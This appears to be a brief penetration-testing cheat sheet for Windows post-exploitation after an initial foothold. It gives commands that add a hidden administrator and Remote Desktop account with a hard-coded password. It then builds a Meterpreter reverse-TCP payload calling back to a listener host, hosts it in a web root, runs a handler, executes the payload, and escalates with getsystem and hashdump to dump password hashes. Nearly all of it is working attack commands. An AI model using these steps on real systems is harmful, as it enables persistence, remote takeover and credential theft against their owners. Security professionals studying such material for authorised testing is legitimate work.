Add RDP Account & Ride on Meterpreter
with initial foothold
Remote Desktop
net user pentest Pen.TE$t2024!1 /ADD
net localgroup "Remote Desktop Users" pentest /add
net localgroup "Administrators" pentest /addMeterpreter
use payload/windows/meterpreter/reverse_tcp
set lhost=10.9.254.6
set lport=8888
generate -f exe -o /var/www/html/meterpreter.exeuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.9.254.6
set lport 8888
runTransfer meterpreter.exe
Run meterpreter.exe

Getsystem & hashdump

Last updated